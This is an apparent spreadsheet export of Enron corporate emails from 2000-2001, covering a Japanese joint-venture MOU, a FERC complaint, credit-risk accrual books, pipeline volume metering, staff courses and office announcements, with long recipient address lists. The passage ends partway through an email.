The following attached documents are the draft MOU (still rough) and a summary of the document.  We have not yet showed either of these to Sato, but would plan to do so early next week.  We met with Freshfields for 2 hours the other day to get some basic thoughts and to gauge their interest in helping to draft the JV agreement.  They thought our MOU could be more simple and while I don't completely disagree, I'd like to make sure Sato is 90-95% there before we bring their senior guy(s) to Houston.  Regardless, we need to run both of you through where we are today and plans for the next couple of weeks.  I have a meeting and dinner with Nakatani (head of corp planning and guy who would sign MOU tomorrow).  From all indications it looks as though things are still on track.  There still are a number of items still to work out, but some of these might be deliberately left blank in the MOU._x000D_
_x000D_
Jeff:  I had traded voice mails with Mike about (among other things) having a conference call at 5:30 pm your Thurs (0730 Friday Tokyo).  I am not sure if this is confirmed, but pls let us know if this works or an alternative time._x000D_
_x000D_
Joe_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	McBride, Jane  _x000D_
Sent:	Thursday, October 11, 2001 9:22 PM_x000D_
To:	Hirl, Joseph_x000D_
Cc:	Aronowitz, Alan; Thirsk, Jeremy_x000D_
Subject:	SATO - MOU_x000D_
_x000D_
  _x000D_
_x000D_
Revised draft (without redlining as requested) and brief summary, for discussion with MM/JS attached._x000D_
Thanks._x000D_
Jane_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 07:08:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'joe.gordon@enron.com', 'rogers.herndon@enron.com', 'george.wood@enron.com', 'j..broderick@enron.com', 'mark.bernstein@enron.com', 'dana.davis@enron.com', 'dale.furrow@enron.com', 'michael.brown@enron.com', 'gautam.gupta@enron.com', 'jeffrey.miller@enron.com', 'tom.hoatson@enron.com', 'joe.stepenovitch@enron.com', 'jeff.ader@enron.com', 'john.llodra@enron.com', 'n..stewart@enron.com', 'c..aucoin@enron.com', 'don.black@enron.com', 'chris.dorland@enron.com', 'juan.padron@enron.com', 'janelle.scheuer@enron.com', 'david.guillaume@enron.com', 'f..campbell@enron.com', 'narsimha.misra@enron.com', 'd..thomas@enron.com', 'posey.martinez@enron.com', 'gerald.gilbert@enron.com', 'stephen.plauche@enron.com', 'tom.dutta@enron.com', 'tom.may@enron.com', 'joe.quenet@enron.com', 'howard.fromer@enron.com', 'harry.kingerski@enron.com', 'palmer.letzerich@enron.com', 'robert.stalford@enron.com'})</t>
  </si>
  <si>
    <t>Calpine vs. ISO New England (EL01-124)</t>
  </si>
  <si>
    <t>Calpine Eastern Corporation, Mirant Americas Energy Marketing, L.P., Mirant New_x000D_
England, LLC, Mirant Kendall, LLC, and Mirant Canal, LLC filed a complaint against ISO New England_x000D_
with respect to its unilateral modification of Market Rule 5 and Appendix 5-C of the_x000D_
New England Power Pool (NEPOOL) FERC Electric Rate Schedule No. 6, through which ISO-NE has excluded external energy contracts from its calculation of the Energy Clearing Price since September 1, 2001._x000D_
Interventions in this proceeding are due this week; please let me know immediately whether we have a specific interest.  In any event, I will circulate an update of any FERC action on the complaint._x000D_
_x000D_
Susan Lindberg_x000D_
713.853.0596</t>
  </si>
  <si>
    <t>Fri, 12 Jan 2001 02:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Enron Onsite ChildCare Center Update</t>
  </si>
  <si>
    <t xml:space="preserve">We are proud to announce that Enron will partner with Knowledge Beginnings,=_x000D_
=20_x000D_
one of the leaders in the childcare industry, to provide high quality,=20_x000D_
conveniently located, customer service-oriented childcare for Enron employe=_x000D_
es=20_x000D_
in Houston.  Knowledge Beginnings is a part of the Knowledge Universe=20_x000D_
Company, a family of companies focused on lifelong learning._x000D_
_x000D_
Our childcare center will be located on Louisiana Street across from our=20_x000D_
corporate headquarters.  The anticipated opening date is the fall of 2001. =_x000D_
=20_x000D_
Any full-time or part-time Enron employee who will have a child/children=20_x000D_
between the ages of six weeks and four years by the opening date of the=20_x000D_
center will be eligible to utilize the center._x000D_
_x000D_
Please review the attachment to learn more about Enron=01,s onsite childcar=_x000D_
e=20_x000D_
center.  We are in the process of building a web page dedicated to this=20_x000D_
important project and hope that it will provide you with frequent updates a=_x000D_
nd=20_x000D_
answers to any future questions you may have.  Watch your email for our=20_x000D_
launch date!  We are excited about this new venture and look forward to the=_x000D_
=20_x000D_
center=01,s opening._x000D_
</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 07:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'akarna@lehman.com', 'pfranz@lehman.com', 'lehman.forward@enron.com'})</t>
  </si>
  <si>
    <t>Enron Corp. forward</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a blackline containing Enron Corp. comments to your latest _x000D_
draft.  Please contact Clint Freeland and me to coordinate execution.  _x000D_
Thanks.  Sara_x000D_
</t>
  </si>
  <si>
    <t>Mon, 17 Dec 2001 09:45:55 -0800 (PST)</t>
  </si>
  <si>
    <t>Accomplishments - Kim Watson</t>
  </si>
  <si>
    <t xml:space="preserve">Kim Watson's Accomplishments._x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>frozenset({'tom.wilbeck@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'valter.stoiani@enron.com', 'amber.hamby@enron.com', 'stephanie.segura@enron.com', 'ross.prevatt@enron.com', 'james.whitehead@enron.com', 'leonardo.pacheco@enron.com', 'jin.guo@enron.com', 'ravi.mujumdar@enron.com', 'alton.jackson@enron.com', 'ed.wood@enron.com', 'russell.dyk@enron.com', 'usman.shaukat@enron.com', 'zal.masani@enron.com', 'christopher.chenoweth@enron.com', 'jean-sebastien.fontaine@enron.com', 'marsha.francis@enron.com', 'pearce.hammond@enron.com', 'john.howton@enron.com', 'justin.rostant@enron.com', 'gray.calvert@enron.com', 'monika.causholli@enron.com', 'joana.ryan.bekerman@enron.com', 'shilpa.chunchu@enron.com', 'michelle.zhang@enron.com', 'christa.winfrey@enron.com', 'shiraz.rehman@enron.com', 'elizabeth.shim@enron.com', 'purvi.patel@enron.com', 'lewis.worthy@enron.com', 'stephen.plauche@enron.com', 'farzad.farhangnia@enron.com', 'michael.driscoll@enron.com', 'vladi.pimenov@enron.com', 'michael.kolman@enron.com', 'daniel.ferrell@enron.com', 'sarah.taylor@enron.com', 'angelique.woods@enron.com', 'miguel.vasquez@enron.com', 'william.keeney@enron.com', 'steve.gim@enron.com', 'matthew.lenhart@enron.com', 'sean.keenan@enron.com', 'hector.campos@enron.com', 'greg.martin@enron.com', 'chuck.ames@enron.com', 'kelli.little@enron.com', 'kevin.ruscitti@enron.com', 'seth.hurwitz@enron.com', 'kelley.mcintyre@enron.com', 'crystal.hyde@enron.com', 'mark.castiglione@enron.com', 'erica.bess@enron.com', 'gerardo.benitez@enron.com', 'craig.hall@enron.com', 'nick.hiemstra@enron.com', 'zaib.iqtidar@enron.com', 'anthony.sexton@enron.com', 'daniel.falcone@enron.com', 'tyrell.harrison@enron.com', 'laura.wente@enron.com', 'zeina.el-azzi@enron.com', 'misti.day@enron.com', 'selena.gonzalez@enron.com', 'jason.althaus@enron.com', 'benjamin.thomason@enron.com', 'karla.compean@enron.com', 'chris.mallory@enron.com', 'chad.landry@enron.com', 'hector.alviar@enron.com', 'banu.ozcan@enron.com', 'virawan.yawapongsiri@enron.com', 'homer.lin@enron.com', 'benjamin.markey@enron.com', 'jason.wiesepape@enron.com', 'sscott5@enron.com', 'molly.hellerman@enron.com', 'atticus.lyon@enron.com', 'tara.piazze@enron.com', 'john.massey@enron.com', 'carrie.southard@enron.com', 'andy.chen@enron.com', 'harry.bucalo@enron.com', 'joshua.koenig@enron.com', 'jennifer.martinez@enron.com', 'josephine.lin@enron.com', 'ted.noble@enron.com', 'allan.wu@enron.com', 'todd.hattenbach@enron.com', 'mo.bawa@enron.com', 'matthew.jachimiak@enron.com', 'erin.willis@enron.com', 'mog.heu@enron.com', 'jennifer.newbrough@enron.com', 'shahid.shah@enron.com', 'peter.bennett@enron.com', 'gaurav.babbar@enron.com', 'michael.flanigan@enron.com', 'scott.griffin@enron.com', 'brandon.cavazos@enron.com', 'michael.benien@enron.com', 'petual.jeanmard@enron.com', 'brandon.wax@enron.com', 'kenneth.shulklapper@enron.com', 'lisa.gillette@enron.com', 'akasha.redrick@enron.com', 'catherine.clark@enron.com', 'eric.bass@enron.com', 'kourtney.nelson@enron.com', 'kelly.mccoy@enron.com', 'todd.roten@enron.com', 'clement.lau@enron.com', 'sarah.mulholland@enron.com', 'stanton.ray@enron.com', 'alberto.jimenez@enron.com', 'nate.blackburn@enron.com', 'teresa.dyar@enron.com', 'maria.tefel@enron.com', 'chetan.paipanandiker@enron.com', 'bryan.hull@enron.com', 'michael.garberding@enron.com', 'lisa.connolly@enron.com', 'ryan.hinze@enron.com', 'chu.wang@enron.com', 'avinash.jain@enron.com', 'victor.guggenheim@enron.com', 'israel.estrada@enron.com', 'claudio.ribeiro@enron.com', 'sanjay.patel@enron.com', 'claire.broido@enron.com', 'yvan.chaxel@enron.com', 'chris.herron@enron.com', 'jonathon.pielop@enron.com', 'kate.lucas@enron.com', 'jennifer.bagwell@enron.com', 'joseph.short@enron.com', 'jay.epstein@enron.com', 'sheetal.patel@enron.com', 'gabriel.monroy@enron.com', 'charles.varnell@enron.com', 'paul.gregory@enron.com', 'raimund.grube@enron.com', 'brent.dornier@enron.com', 'gauri.khokha@enron.com', 'john.weakly@enron.com', 'brogers2@enron.com', 'vicky.ha@enron.com', 'jody.crook@enron.com', 'george.zivic@enron.com', 'wjennin@enron.com', 'eric.scott@enron.com', 'binh.pham@enron.com', 'chris.walker@enron.com', 'doug.sewell@enron.com', 'joe.gordon@enron.com', 'jonathan.hoff@enron.com', 'michael.simmons@enron.com', 'jebong.lee@enron.com', 'david.hunker@enron.com', 'ying.soong@enron.com', 'hang.bui@enron.com', 'gautam.gupta@enron.com', 'simone.rose@enron.com', 'ibrahim.qureishi@enron.com', 'marc.sabine@enron.com', 'heather.alon@enron.com', 'robin.rodrigue@enron.com', 'yvette.parker@enron.com', 'rahul.seksaria@enron.com', 'michelle.waldhauser@enron.com', 'sabina.rank@enron.com', 'eva.rainer@enron.com', 'massimo.marolo@enron.com', 'winston.cheng@enron.com', 'damon.harvey@enron.com', 'leonard.tham@enron.com', 'jennifer.reside@enron.com', 'john.scarborough@enron.com', 'travis.winfrey@enron.com', 'christian.hackett@enron.com', 'evan.betzer@enron.com', 'john.king@enron.com', 'adnan.patel@enron.com', 'fatimata.liamidi@enron.com', 'sachin.gandhi@enron.com', 'john.gordon@enron.com', 'daniel.graham@enron.com', 'ryan.deane@enron.com', 'angie.zeman@enron.com', 'jolly.jose@enron.com', 'reza.rezaeian@enron.com', 'geir.solberg@enron.com', 'alicia.perkins@enron.com', 'milind.pasad@enron.com', 'stephen.thome@enron.com', 'elizabeth.howley@enron.com', 'ryan.synnott@enron.com', 'darren.maloney@enron.com', 'cooper.richey@enron.com', 'victor.browner@enron.com', 'carlos.ruiz@enron.com', 'mario.cardoso@enron.com', 'justyn.thompson@enron.com', 'brian.hoskins@enron.com', 'iris.ng@enron.com', 'dayem.khandker@enron.com', 'brando.hayden@enron.com', 'bret.scholtes@enron.com', 'george.thomas@enron.com', 'chad.gronvold@enron.com', 'jason.seigal@enron.com', 'imad.tareen@enron.com'})</t>
  </si>
  <si>
    <t>A&amp;A brown bag</t>
  </si>
  <si>
    <t>Thank you to those who have already RSVP'd for this informative brown bag _x000D_
session.  This is one of the last opportunities you'll have to gain more _x000D_
insight into our business.  Please RSVP ASAP, Okay?_x000D_
_x000D_
Jen Fraser, Director of Origination in EGM - December 5 from 12 to 1 in 30C1</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 10:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Steve, I attach a further draft of the presentation incorporating comments _x000D_
from John Sherriff._x000D_
_x000D_
_x000D_
_x000D_
I have made the following changes:_x000D_
_x000D_
Cover Page. Listed key themes in the notes_x000D_
Benefits of Liberalization. Expanded reference to "Improved allocation of _x000D_
risk"_x000D_
Benefits- Cost Savings graph. Simplified graph by removing OECD average_x000D_
Benefits - What went wrong in California. Reworded_x000D_
Benefits - Improved Customer Choice. Deleted_x000D_
Policy Goals. Deleted_x000D_
Successful Transition to Deregulation. Deleted reference to "phased _x000D_
liberalization"_x000D_
Successful transition to Deregulation. Replaced reference to "investment" _x000D_
with reference to "independent regulator"_x000D_
Transition issues and Solutions. Replaced reference to "Germany" with the _x000D_
"Netherlands"_x000D_
Today's New Economy. Deleted reference to "Winner Takes All"_x000D_
Components of Transformation Process. Moved a number of industries to _x000D_
"Transformed Markets" category_x000D_
Enron and the Japanese Market. Referenced broadband_x000D_
Conclusion. Changed the last bullet point.</t>
  </si>
  <si>
    <t>Tue, 20 Feb 2001 09:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Energy and Developing Products conference</t>
  </si>
  <si>
    <t xml:space="preserve">I am available as a last resort.  I have asked Alan Aronowitz who is the GC _x000D_
of Enron Global Markets to make a presentation.  I will let you know.   Mark_x000D_
_x000D_
_x000D_
_x000D_
	"Liz O'Sullivan" &lt;LOSULLIVAN@isda.org&gt;_x000D_
	02/20/2001 11:36 AM_x000D_
		 _x000D_
		 To: Mark Haedicke &lt;Mark.E.Haedicke@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Energy and Developing Products conference_x000D_
_x000D_
_x000D_
Mark:_x000D_
_x000D_
I write this email to discuss the Energy and Developing Products conference_x000D_
in Houston on March 6th, 2001.  Attached please find a copy of the latest_x000D_
agenda for your perusal.  Mark Taylor graciously helped me find speakers for_x000D_
the conference.  However, I just want to confirm with you your availability_x000D_
to speak on the Panel Discussion on Recent Events and the Growth of New_x000D_
Products at 9:30 AM._x000D_
 &lt;&lt;spkeragendaEnergy.doc&gt;&gt;_x000D_
The issues to be discussed include:  Power Price Spikes; Delivery Failures;_x000D_
OPEC Production Decisions; Emissions Trading; and New and Developing_x000D_
Products.  Christophe Chassard will also speak on the panel.  This is a_x000D_
difficult panel to find speakers.  We have invited Steve Bunkin to join_x000D_
panel and still waiting for his reply.   If he accepts then we will have_x000D_
just three speakers on the panel.  Christophe said he is comfortable_x000D_
speaking about OPEC production decisions and to a lesser extent power price_x000D_
spikes._x000D_
_x000D_
Let me know if you are available to speak.  And if so, what topics on panel_x000D_
you would feel comfortable discussing._x000D_
_x000D_
Thanks,_x000D_
Liz_x000D_
212-332-2559_x000D_
_x000D_
_x000D_
_x000D_
 - spkeragendaEnergy.doc_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 04:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephen.dyer@bakerbotts.com'})</t>
  </si>
  <si>
    <t>Re: Follow-Up</t>
  </si>
  <si>
    <t>The engagement letter was mailed last week.  If you do not get it by tomorrow _x000D_
please let me know.  Thank you.</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 07:00:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>status of accrual books &amp; risk</t>
  </si>
  <si>
    <t>Dear Sally,_x000D_
_x000D_
As we discussed on Thursday, I am putting together some discussion points for the individual risk groups regarding the receipt by credit of complete credit information.  Essentially, I am trying to determine how pervasive the problem is of credit not receiving accrual books with credit risk.  The probable reason for this is that certain books require accrual treatment for accounting purposes.  Once I hear from Debbie/Mark on the message below, I will start working with the individual risk groups.  _x000D_
_x000D_
Regards_x000D_
_x000D_
Shona_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Wilson, Shona  _x000D_
Sent:	Friday, October 12, 2001 1:42 PM_x000D_
To:	Brackett, Debbie R.; Ruane, Mark_x000D_
Cc:	Considine, Keith_x000D_
Subject:	accrual books_x000D_
_x000D_
I've been thinking through credit's need for the forward values on 3rd party trades that are treated as accrual for accounting purposes._x000D_
_x000D_
I'm planning a meeting with the different risk heads to discuss the volume of transactions that fall into this category, but before I do that I need confirmation from you that I fully understand what you need the information for.  If you could, please confirm (or explain what I'm missing in my reasoning) the following in regards to forward values for third party trades treated as accrual for accounting purposes:_x000D_
_x000D_
Margins - you do need these forward values for margining purposes._x000D_
_x000D_
Credit limit - you do need these forward values when determining total exposure per counterparty against their limits._x000D_
_x000D_
Analysis - Potential Exposure, margin liquidity, counterparty by curve - I think you would need these positions for your analyses._x000D_
_x000D_
Credit reserve - the value would not be needed for the credit reserve, as the purpose for the reserve is accounting related.  As these books are treated as accrual for accounting purposes, they should not be considered in the reserve._x000D_
_x000D_
Once I hear from you I'll work with the different BU's risk groups to see if there any problems with these types of books (problems such as them not being calced daily).  I'd like to meet with them early next week, so if you could get back to me as soon as you can, I'd really appreciate it._x000D_
_x000D_
Best regards_x000D_
_x000D_
Shona</t>
  </si>
  <si>
    <t>Mon, 27 Mar 2000 02:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lee.papayoti@enron.com'})</t>
  </si>
  <si>
    <t>ExxonMobil Beaumont Refinery Fuel Needs</t>
  </si>
  <si>
    <t xml:space="preserve">fyi - you will need to enter this into Sitara - remember, first 10,000/d is _x000D_
EOG transport._x000D_
_x000D_
---------------------- Forwarded by Lee L Papayoti/HOU/ECT on 03/27/2000 _x000D_
10:56 AM ---------------------------_x000D_
_x000D_
_x000D_
"Brian E Nichols" &lt;brian_e_nichols@email.mobil.com&gt; on 03/24/2000 02:20:27 PM_x000D_
To: lpapayo@ect.enron.com_x000D_
cc:  (bcc: Lee L Papayoti/HOU/ECT)_x000D_
Subject: ExxonMobil Beaumont Refinery Fuel Needs_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Lee,_x000D_
_x000D_
I did my fuel gas estimate and think that we will need 120-125 BBTU/Day of _x000D_
fuel_x000D_
gas for the month of April.  On a side note, we will bring down our gas _x000D_
turbine_x000D_
generator on Sunday morning.  This will bring our high pressure gas _x000D_
requirements_x000D_
down to essentially zero (it will be zero if our Hydrogen Plant stays down) _x000D_
and_x000D_
the demand will transfer to our low pressure gas.  We will be in this_x000D_
arrangement for approximately 20 days._x000D_
_x000D_
Brian_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 08:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'april.hrach@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'osman.sezgen@enron.com', 'aandy.ly@enron.com', 'michael.danielson@enron.com', 'cary.fukada@enron.com', 'jennifer.lind@enron.com', 'dave.perrino@enron.com', 'samuel.wehn@enron.com', 'ibrahim.qureishi@enron.com', 'steve.kromer@enron.com', 'gray.calvert@enron.com', 'mona.petrochko@enron.com', 'cristina.zavala@enron.com', 'susan.mara@enron.com', 'joseph.alamo@enron.com', 'mary.schoen@enron.com', 'derek.kelly@enron.com', 'edith.turnipseed@enron.com', 'mark.fillinger@enron.com', 'octavio.carranza@enron.com', 'ronald.mentan@enron.com', 'michael.wong@enron.com', 'ryan.deane@enron.com', 'scott.healy@enron.com', 'dean.russell@enron.com', 'pbray@newpower.com', 'victor.browner@enron.com', 'david.parquet@enron.com', 'rob.bakondy@enron.com', 'jeff.dasovich@enron.com', 'sandra.mccubbin@enron.com', 'vicky.ha@enron.com', 'kelly.brodbeck@enron.com', 'laird.dyer@enron.com', "aida.o'neal@enron.com", 'michael.mcdonald@enron.com'})</t>
  </si>
  <si>
    <t>Baby Shower for Catherine</t>
  </si>
  <si>
    <t>Hi All!_x000D_
_x000D_
We have set this Wed., May 23 at 2 PM for Catherine's baby shower._x000D_
Currently, I have a $150 target card as a present for her.  Jen and I are _x000D_
also _x000D_
going to run out and grab a book and an outfit or two tomorrow.  These items, _x000D_
as well as the cake and ice cream, will be from the entire office.  If you _x000D_
would _x000D_
like to buy her something of your own feel free.  Otherwise, you can make a _x000D_
donation to the gift card and other items.  If you are looking for a donation _x000D_
amount, _x000D_
anywhere from $5 - $10 is adequate, but there is no pressure to give _x000D_
anything.  I will _x000D_
be out of the office so Jen will be coordinating everything that day.  _x000D_
_x000D_
April Hrach_x000D_
Administrative Coordinator_x000D_
Phone: 415-782-7825_x000D_
Fax: 415-782-7851</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 05:09:52 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tom.rice@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'donna.lachapelle@enron.com', 'team.farmington-pipeline@enron.com', 'raetta.zadow@enron.com', 'e..anderson@enron.com', 'angeline.stewart@enron.com'})</t>
  </si>
  <si>
    <t>RE: Daily Volumes For Midwest Natural Gas</t>
  </si>
  <si>
    <t xml:space="preserve">I believe this generated $75 worth of discretion with Midwest Gas.  Unless I am not seeing something here, I don't feel as though investing dollars to install EFM or Bullhorn would be a good idea.   _x000D_
_x000D_
Tom_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Anderson, Gary E.  _x000D_
Sent:	Thursday, October 25, 2001 8:17 AM_x000D_
To:	Zadow, Raetta; Lachapelle, Donna; Stewart, Angeline; Farmington-Pipeline, Team; Rice, Tom_x000D_
Cc:	Blair, Lynn; Dietz, Rick; Floyd, Jodie_x000D_
Subject:	RE: Daily Volumes For Midwest Natural Gas_x000D_
_x000D_
The charts from these locations are not received in time to process for the 5th work day close, so these daily volumes are determined systematically based on the beginning and ending index readings. Even if they were, it is impossible to determine daily volume consumption from a 31day chart. Even decreasing the chart rotation is not a solution unless charts are received by the third work day to allow sufficient time for processing. The answer is to install EFM or possibly a Bullhorn unit to determine the actual daily index readings so that the daily quantities are accurately determined.. On these types of installations, how can we assess penalties on anything other than monthly quantities ? NNG has several locations where the existing equipment does not meet today's business needs, so we probably need to determine where these deficiencies exists, and identify the costs to resolve the problem._x000D_
Thanks-_x000D_
Gary_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Zadow, Raetta  _x000D_
Sent:	Tuesday, October 09, 2001 9:04 AM_x000D_
To:	Anderson, Gary E.; Lachapelle, Donna; Stewart, Angeline; Farmington-Pipeline, Team; Rice, Tom_x000D_
Cc:	Blair, Lynn; Dietz, Rick; Floyd, Jodie; Zadow, Raetta_x000D_
Subject:	FW: Daily Volumes For Midwest Natural Gas_x000D_
_x000D_
Gary, was wondering if you could help us out. Scott has told me that they have 31 day charts for the stations listed below and he was wondering why we couldn't read those so as to get daily volumes rather than taking the total for the month and dividing it by the number of days in the month to get the daily volume.  The reason for this is because, especially in the winter time, this can become very crucial when we calculate the penalty invoices which are done daily and are based on the differences between the daily physical volumes and the volumes that the shippers have scheduled on our pipe.  If these charts cannot be read daily, what can we do to make it so that they can. Could you please check to find out what we need to do in order to have accurate daily volumes for these stations._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Raetta_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Farmington-Pipeline, Team  _x000D_
Sent:	Monday, October 08, 2001 9:55 AM_x000D_
To:	Zadow, Raetta_x000D_
Subject:	Re: Daily Volumes For Midwest Natural Gas_x000D_
_x000D_
Raetta, here are the stations  numbers.  Thanks for your help. Scott 612-270-8501_x000D_
Arcadia 747-051-01,02_x000D_
Eleva 747-161_x000D_
Independance 747-221_x000D_
Mondovi 747-341-01,02_x000D_
Strum 747-411_x000D_
Whitehall #1 747-921_x000D_
Whitehall #3 747-923_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; _x000D_
Team Farmington-Pipeline_x000D_
06/22/2001 07:58 AM_x000D_
To:	Raetta Zadow/ET&amp;S/Enron@ENRON_x000D_
cc:	Tom Rice/ET&amp;S/Enron@ENRON, Bob Stevens/ET&amp;S/Enron, Angeline Stewart/GPGFIN/Enron, Diana Porter/ET&amp;S/Enron@ENRON, Jodie Floyd/ET&amp;S/Enron@ENRON, Raetta Zadow/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject:	Re: Daily Volumes For Midwest Natural Gas   &lt;&lt; OLE Object: StdOleLink &gt;&gt; _x000D_
_x000D_
Thanks for looking into this for me Raetta.  I talked to Jim Banker this week and asked for him to check and see if they were charged for any penalty gas or not.  He said that he would let me know if they had.  He also stressed that we still need to see the actual daily volumes instead of average daily volumes on the volume statements.  I'm not quit sure if this part of the problem has been addressed yet or not.  Please let me know. Thanks Scott  _x000D_
_x000D_
_x000D_
 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; _x000D_
Raetta Zadow_x000D_
06/15/2001 04:43 PM_x000D_
To:	Team Farmington-Pipeline/ET&amp;S/Enron@ENRON_x000D_
cc:	Tom Rice/ET&amp;S/Enron@ENRON, Bob Stevens/ET&amp;S/Enron, Angeline Stewart/GPGFIN/Enron, Diana Porter/ET&amp;S/Enron@ENRON, Jodie Floyd/ET&amp;S/Enron@ENRON, Raetta Zadow/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject:	Re: Daily Volumes For Midwest Natural Gas   &lt;&lt; OLE Object: StdOleLink &gt;&gt; _x000D_
_x000D_
I have looked at the DDVC invoices for Midwest for March, 2001 which total $304.70.  The SMS charges amount to $76.30 but the biggest part of the invoice is the negative DDVC charge which is for $228.40  - this occurred on March 26.  I was wondering if the Midwest Natural Gas people could let us know what they think the volumes should be on those specific wells that they are concerned about for the 26th and then if necessary, we could make those corrections.  Please let me know if there is anything else that I can do to help._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Raetta_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; _x000D_
Team Farmington-Pipeline_x000D_
06/14/2001 03:04 PM_x000D_
To:	Tom Rice/ET&amp;S/Enron@ENRON, Bob Stevens/ET&amp;S/Enron, Raetta Zadow/ET&amp;S/Enron@ENRON, Angeline Stewart/GPGFIN/Enron, Diana Porter/ET&amp;S/Enron@ENRON_x000D_
cc:	 _x000D_
_x000D_
Subject:	Daily Volumes For Midwest Natural Gas_x000D_
_x000D_
I recently met with Jim Banker with Midwest Natural Gas from Whitehall, Wi.  He informed me that he had some concerns about whether or not he was being charged for penalty gas for daily volumes.  He showed me some gas volume statements that he recieved from GMS.  I believe it was the month of March Statement.  What the statement showed is average daily volumes instead of the actual volumes per day. (Ex. At  Eleva TBS Days 1 and 2 showed 122 MCF and Days 3-31  showed 118 MCF.)  These are charted stations with 31 day charts.  The stations that he is concerned about are Arcadia, Eleva, Independance, Mondovi, Strum, Whitehall #1,and  Whitehall #3.  Any assistance or knowledge that you can provide me would be greatly appreciated.  Thanks Scott 612-270-8501_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 3 Jul 2000 02:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Metals CPs</t>
  </si>
  <si>
    <t>Tana:_x000D_
_x000D_
I need to send a copy of the metals CP list to my documentation department _x000D_
for their assistance.  I'm sending them a hard copy, but I'd appreciate if _x000D_
you could forward an electronic copy to Melissa Murphy._x000D_
_x000D_
Thanks_x000D_
_x000D_
Leslie</t>
  </si>
  <si>
    <t>Wed, 31 Oct 2001 14:35:43 -0800 (PST)</t>
  </si>
  <si>
    <t>ELM Finance Course Offerings</t>
  </si>
  <si>
    <t>_x000D_
 Take advantage of the following courses remaining for 2001._x000D_
_x000D_
 _x000D_
Electric Business Understanding - November 27_x000D_
The Electric Business Understanding Seminar will give a basic overview of the electric business for those with limited knowledge of this industry. This seminar is recommended for entry level to mid-level employees in either the gas or electric business or in businesses providing services to these industries. _x000D_
 _x000D_
Understanding Swaps - November 8 &amp; 9 and December 13 &amp; 14_x000D_
This course is appropriate for all employees wishing to obtain a practical understanding of the basic natural gas and power derivative structures that are traded and marketed today. An emphasis is placed on understanding how financial tools are added to physical structures to meet the risk management needs of clients._x000D_
_x000D_
Understanding Options - November 27 &amp; 28 and December 18 &amp; 19_x000D_
This course builds on our Derivatives 1 program and is appropriate for all employees looking to extend their knowledge of basic derivatives. Swaps and options are revisited, but from a more sophisticated perspective. Option pricing concepts are approached pragmatically, both from the trading and structuring/marketing perspectives. The program does not involve complex mathematics._x000D_
_x000D_
Structuring Natural Gas Transactions - November 19 &amp; 20_x000D_
This course builds on the DI - Applied Energy Derivatives program, focusing on deal structuring opportunities particular to the Natural Gas markets.  Participants will develop insights into the economic inter-relationships between the physical operations (pipelines, storage, generation, etc.) and their synthetic financial counterparts (basis, time spread and multi-fuel derivatives).  Emphasis is directed at identifying marketing opportunities that follow from these concepts.  This is not an introduction to natural gas markets.  _x000D_
 _x000D_
_x000D_
For enrollment, or more information on these courses, please log on to http://elm.enron.com.</t>
  </si>
  <si>
    <t>Sat, 24 Feb 2001 02:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael.gapinski@painewebber.com'})</t>
  </si>
  <si>
    <t>RE: Buying back calls</t>
  </si>
  <si>
    <t xml:space="preserve">Michael:_x000D_
Thanks for putting the paperwork together.  _x000D_
_x000D_
I would have interest in meeting if you can present unique investment _x000D_
opportunities that I don't have access to now.  Most of my contact with _x000D_
financial advisors in the past has consisted of them suggesting a mutual _x000D_
fund, telling me to invest in Home Depot, Sun, and Coke, or trying to pass _x000D_
off their banks' biased research reports as something valuable.  The above _x000D_
services provide no value to me personally.  If you can present opportunities _x000D_
such as access to private equity or hedge funds, or other ideas with strong _x000D_
growth potential and low correlation to the S@P, I'd listen._x000D_
_x000D_
John_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Michael Gapinski" &lt;michael.gapinski@painewebber.com&gt; on 02/21/2001 08:23:04 _x000D_
AM_x000D_
To: "'John.Arnold@enron.com'" &lt;John.Arnold@enron.com&gt;_x000D_
cc: "'Rafael Herrera'" &lt;rafael.herrera@painewebber.com&gt; _x000D_
Subject: RE: Buying back calls_x000D_
_x000D_
_x000D_
John -_x000D_
_x000D_
